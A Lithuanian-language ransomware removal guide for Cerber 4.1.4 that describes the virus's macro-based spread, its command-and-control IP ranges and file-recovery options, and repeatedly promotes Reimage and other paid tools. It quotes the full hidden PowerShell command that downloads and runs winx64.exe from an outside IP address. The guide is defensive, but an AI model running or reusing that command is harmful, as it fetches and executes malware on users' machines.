Sudėtingumo skalė:  
  (99/100)

Cerber 4.1.4 virusas. Kaip pašalinti? (Pašalinimo instrukcijos)

parašė Julija Splinters - - | Tipas: Ransomware

Teroras tęsiasi – pasirodė Cerber 4.1.4 virusas

Cerber 4.1.4 virusas yra grėsmingosios Cerber kibernetinės kampanijos tęsinys. Praėjo savaitė, kai hakeriai sudrebino virtualią bendruomenę su Cerber 4.1.0 ir Cerber 4.1.1 viruso versijomis. Matyt, šios failus užkoduojančio viruso versijos buvo per silpnos, todėl buvo sukurtas dar vienas atnaujinimas. Jis tęsia pirmtakų darbą ir į užgrobtus failus įterpia plėtinį, sudarytą iš atsitiktinių simbolių. Paskutinioji versija buvo atnaujinta Locky ransomware pavyzdžiu ir yra aktyvuojama panašiu būdu. Cerber 4.1.4 virusas naudoja Word dokumentą ir prašo įgalinti Macro komandas, kad viruso vykdomasis failas galėtų patekti į kompiuterį. IT specialistai plačiai diskutuoja apie šią viruso plėtros strategiją, kurią naudojo ir Locky virusas. Interneto vartotojai, kurie seka IT pasaulio naujienas, tikrai gali išvengti šio kibernetinio pavojaus. Tačiau, jeigu virusui vis dėlto pavyko įsibrauti į jūsų kompiuterį, nėra jokio reikalo panikuoti. Tiesiog turite pašalinti Cerber 4.1.4 pasinaudodami Reimage.

Naujoji viruso versija tęsia pirmtakų pradėtus darbus ir kelia chaosą visame pasaulyje. Kaip ir 4.1.0 bei 4.1.1 versijos, jis taip pat naudoja IP adresą, kad galėtų nusiųsti UDP paketus į nuotolinį Command & Control serverį. Paskutinioji versija patobulino šią techniką ir naudoja trijų IP adresų rinkinį (5.55.50.0/27, 192.42.118.0/27, 194.165.16.0/22), kurie padeda perduoti techninę informaciją į serverį. Ši savybė leidžia viruso kūrėjams surinkti daugiau vertingos informacijos apie užgrobtus kompiuterius. Akivaizdu, kad tokia galimybė įkvepia hakerius tobulinti virusą ir kurti dar pavojingesnes jo versijas.

Cerber 4.1.4 virusas - naujausia Cerber versija

Vienas pagrindinių Cerber 4.1.4 viruso išskirtinumų yra naujas jo sklaidos būdas. Ankstesnės šio failus užkoduojančio viruso versijos jau naudojo „spam“ žinutes ir netikras sąskaitas siekiant įsibrauti į kompiuterius, tačiau ši versija pradėjo naudoti Macro komandas. Kai vartotojas atidaro gautą .doc failą, jis pamato MS Word dokumentą, kuriame pateikiamos atsitiktinių ženklų ir kodų eilutės. Visa laime, naujosios Microsoft Word versijos išjungė automatinį Macro komandų aktyvavimą. Tad virusas prašo vartotojų jas aktyvuoti. Paskui, kai reikiami nustatymai yra modifikuoti, Cerber 4.1.4 ransomware virusas paleidžia PowerShell. Po kelių sekundžių, base64 tipo komandos eilutė pradeda viruso aktyvavimą ir pabaigia šia eilute:

POWERSHELL.EXE -window hidden (New-Object System.Net.WebClient).DownloadFile(‘http://94.102.58.30/~trevor/winx64.exe’,“$env:APPDATA\winx64.exe“);Start-Process („$env:APPDATA\winx64.exe“)

Kaip matote, ši komanda reikalinga tam, kad būtų atsiųstas ir aktyvuotas pagrindinis aktyvavimo elementas – win64.exe failas. Tačiau, jeigu naudojate 32-bit Windows system, aktyvavimo failas yra win32.exe. Tuomet virusas palieka failą %AppData% aplanke ir elgiasi įprastai: užkoduoja visus kompiuteryje esančius duomenis ir darbalaukyje palieka Readme.hta failą. Be to, failų šifravimui pasibaigus, pakeičiamas darbalaukio fono paveikslas, kuriame informuojama apie Cerber 4.1.4 ataką. Išvydę šią žinutę, nepulkite į paniką ir nesuskubkite paklusti kibernetinių nusikaltėlių raginimui sumokėti išpirką. Iš tiesų, kol kas nėra jokio efektyvaus užšifruotų duomenų atkodavimo būdo, tačiau pervesti pinigai negarantuoja, kad hakeriai padės atkurti prarastus failus. Tačiau šiuo metu jūsų prioritetu turėtų tapti Cerber 4.1.4 pašalinimas.

Viruso plėtros ypatumai

Cerber 4.1.4 virusas platinamas naudojant gerai žinomą ir hakerių pamėgtą strategiją – užkrėstas elektroninio pašto žinutes (spam). Interneto vartotojai yra nuolatos perspėjami dėl elektroniniame pašte tykančių pavojų ir perspėjami neatidaryti sąskaitų, oficialių dokumentų ar policijos pranešimų, kuriuos atsiunčia nežinomi siuntėjai. Tačiau nukentėjusiųjų skaičius vis tiek išlieka aukštas. Kibernetiniai nusikaltėliai naudoja puikiai apgalvotas įtikinėjimo strategijas ir sėkmingai priverčia vartotojus paklusti jų scenarijui. Tad jeigu gavote laišką iš policijos, mokesčių inspekcijos ar kitos oficialios institucijos, prieš atidarydami laiške prisegtą dokumentą, įsitikinkite jo tikrumu. Atidžiai peržiūrėkite, ar nėra paliktų gramatinių, raštvedybos ar kitokių klaidų. Taip pat atkreipkite dėmesį į tai, ar yra pridėti įmonę reprezentuojantys atributai (logotipas, parašas ir pan.), o jų nebuvimas yra svarbus indikatorius, kad laiškas greičiausiai yra netikras.

Ar įmanoma visiškai pašalinti Cerber 4.1.4 virusą?

Efektyvus Cerber 4.1.4 pašalinimas įmanomas tik tada, kai naudojama patikima antivirusinė programa. Įdiegę programą ją atnaujinkite ir tuomet pradėkite viruso pašalinimą. Tokios antivirusinės programos, kaip Reimage ar Malwarebytes MalwarebytesCombo Cleaner, įprastai sugeba pašalinti Cerber 4.1.4 virusą per kelias minutes. Tačiau jeigu norite atkurti prarastus failus, jums teks nusivilti. Vienintelis efektyvus būdas atkurti užšifruotus duomenis yra pasinaudoti atsarginėmis duomenų kopijomis. Jeigu jų neturite, galite mėginti pasinaudoti alternatyviais failų atkūrimo būdais, kuriuos rasite straipsnio pabaigoje. Be to, jeigu virusas užrakino jūsų kompiuterio ekraną ar negalite įdiegti antivirusinės programos, atidžiai sekite žemiau pateiktas instrukcijas.

Pasiūlymas
nelauk!
Parsisiųsk
Reimage (pašalinimo programa) Laimės
garantija
Parsisiųsk
Reimage (pašalinimo programa) Laimės
garantija
Suderinama su Microsoft Windows Supported versions Suderinama su OS X Supported versions
Ką daryti, jei nepavyko pašalinti?
Jei nepavyko pašalinti viruso žalos su Reimage, užduokite klausimą mūsų pagalbos komandai ir pateikite kiek galite daugiau detalių.
Reimage yra rekomenduojama viruso žalos panaikininui. Nemokama programos versija leidžia patikrinti ar kompiuteris yra užkrėstas, ar ne. Viruso pašalinimui gali būti naudojama tik licencijuota Reimage versija.

Rankinis Cerber 4.1.4 viruso pašalinimas:

Kaip ištrinti Cerber 4.1.4 naudojant Safe Mode with Networking

 • Žingsnis 1: Perkraukite kompiuterį į Safe Mode with Networking režimą

  Windows 7 / Vista / XP
  1. Paspauskite Start Shutdown Restart OK.
  2. Kai kompiuteris įsijungs iš naujo, pradėkite spaudinėti F8. Tai darykite tol, kol pasirodys Advanced Boot Options langas.
  3. Iš sąrašo pasirinkite Safe Mode with Networking Pasirinkite 'Safe Mode with Networking'

  Windows 10 / Windows 8
  1. Spustelėkite Power Windows mygtuką. Po to spauskite ir paspaudę laikykite Shift mygtuką, galiausiai pasirinkite Restart..
  2. Pasirinkite Troubleshoot Advanced options Startup Settings ir vėl spauskite Restart.
  3. Kai kompiuteris įsijungs iš naujo, lange Startup Settings pasirinkite Enable Safe Mode with Networking Pasirinkite 'Enable Safe Mode with Networking'
 • Žingsnis 2: Cerber 4.1.4 šalinimas

  Prisijunkite prie užkrėstos paskyros ir paleiskite savo naršyklę. Atsisiųskite Reimage ar kitą patikimą antivirusinę programą. Atnaujinkite ją ir patikrinkite savo kompiuterį. Kai programa baigs sistemos tikrinimą, ištrinkite visus jos nurodytus pavojingus failus ir užbaikite Cerber 4.1.4 pašalinimą.

Jeigu virusas blokuoja Safe Mode with Networking, išbandykite sekantį metodą.

Kaip ištrinti Cerber 4.1.4 naudojant System Restore

 • Žingsnis 1: Perkraukite kompiuterį į Safe Mode with Command Prompt režimą

  Windows 7 / Vista / XP
  1. Paspauskite Start Shutdown Restart OK.
  2. Kai kompiuteris įsijungs iš naujo, pradėkite spaudinėti F8. Tai darykite tol, kol pasirodys Advanced Boot Options langas.
  3. Iš sąrašo pasirinkite Command Prompt Pasirinkite 'Safe Mode with Command Prompt'

  Windows 10 / Windows 8
  1. Spustelėkite Power Windows mygtuką. Po to spauskite ir paspaudę laikykite Shift mygtuką, galiausiai pasirinkite Restart..
  2. Pasirinkite Troubleshoot Advanced options Startup Settings ir vėl spauskite Restart.
  3. Kai kompiuteris įsijungs iš naujo, lange Startup Settings pasirinkite Enable Safe Mode with Command Prompt Pasirinkite 'Enable Safe Mode with Command Prompt'
 • Žingsnis 2: Atstatykite sistemos nustatymus ir failus
  1. Kai pasirodys Command Prompt langas, įveskite cd restore ir spustelėkite Enter. Įveskite 'cd restore' (be kabučių) ir spauskite 'Enter'
  2. Dabar įrašykite rstrui.exe ir vėl spustelėkite Enter.. Įveskite 'rstrui.exe' (be kabučių) ir spauskite 'Enter'
  3. Kai pasirodys naujas langas, spustelėkite Next ir pasirinkite sistemos atkūrimo tašką, kuris yra prieš Cerber 4.1.4 pasirodymą jūsų kompiuteryje. Po to vėl paspauskite Next. Pasirodžius 'System Restore' langui, pasirinkite 'Next'. Pasirinkite sustemos atkūrimo tašką ir spustelėkite 'Next'
  4. Dabar spauskite Yes ir pradėkite sistemos atstatymą. Dabar spauskite 'Yes' ir pradėkite sistemos atstatymą.
  Sugrąžinę buvusius sistemos nustatymus, atsisiųskite Reimage ir nuskenuokite kompiuterį, tam kad įsitikintumėte, jog Cerber 4.1.4 sėkmingai pašalintas.

Svarbu. Kaip atkurti duomenis?

Instrukcijos, pateiktos aukščiau, yra skirtos padėti jums ištrinti Cerber 4.1.4. Tam, jog atkurtumėte savo failus, rekomenduojame sekti virusai.lt ekspertų paruoštas instrukcijas.

Jei Cerber 4.1.4 užšifravo jūsų asmeninius failus, galite pabandyti juos atkurti šiais būdais:

Ar Data Recovery Pro yra efektyvus?

Ši programa gali būti vienintele jūsų viltimi atkurti bent jau dalį užkoduotų duomenų, kol virusų tyrėjams pavyks sukurti įrankį, leidžiantį atkurti Cerber 4.1.4 užgrobtus failus. 

 • Parsisiųsti Data Recovery Pro;
 • Įdiekite Data Recovery sekdami diegimo vedlio nurodymus;
 • Atverkite programą bei paleiskite kompiuterio skenavimą tam, jog rastumėte failus, paveiktus Cerber 4.1.4 viruso;
 • Atkurkite juos.

Ar Windows Previous Version function gali padėti?

Nepaisant to, kad šis failus užkoduojantis virusas yra destruktyvus ir galingas, jums gali pavykti atkurti bent jau dalį prarastų dokumentų. Tačiau šis metodas jums gali padėti tik tuo atveju, jeigu prieš viruso ataką buvo aktyvuota System Recovery funkcija.

 • Suraskite jums reikalingą užšifruotą failą ir paspauskite ant jo dešiniuoju pelės klavišu;
 • Spauskite ant “Properties”, o tuomet atverkite “Previous versions” skirtuką;
 • “Folder versions” lentelėje ieškokite egzistuojančių failo kopijų. Jei jų yra, pasirinkite pageidaujamą failo versiją ir spauskite “Restore”.

Galiausiai, susimąstykite apie savo kompiuterio apsaugą ir tokių virusų kaip Cerber 4.1.4 prevenciją. Kad apsisaugotumėte nuo ransomware kategorijai priskiriamų virusų, naudokite patikimas antivirusines, tokias kaip Reimage, Malwarebytes MalwarebytesCombo Cleaner arba Plumbytes Anti-MalwareMalwarebytes Malwarebytes.

Apie autorių

Julie Splinters
Julie Splinters - Virusų šalinimo specialistė

Jeigu šios nemokamos instrukcijos jums padėjo ir jūs esate patenkintas/-a mūsų suteikta pagalba, prašome apsvarstyti galimybę mus paremti ir padėti mums išlaikyti šią paslaugą. Bus įvertinta net pati mažiausia auka.

Susisiekite su Julie Splinters
Apie kompaniją Esolutions

Šaltinis: https://www.2-spyware.com/remove-cerber-4-1-4-ransomware-virus.html

Šalinimo instrukcijos kitomis kalbomis


Jūsų nuomonė apie Cerber 4.1.4 ransomware virus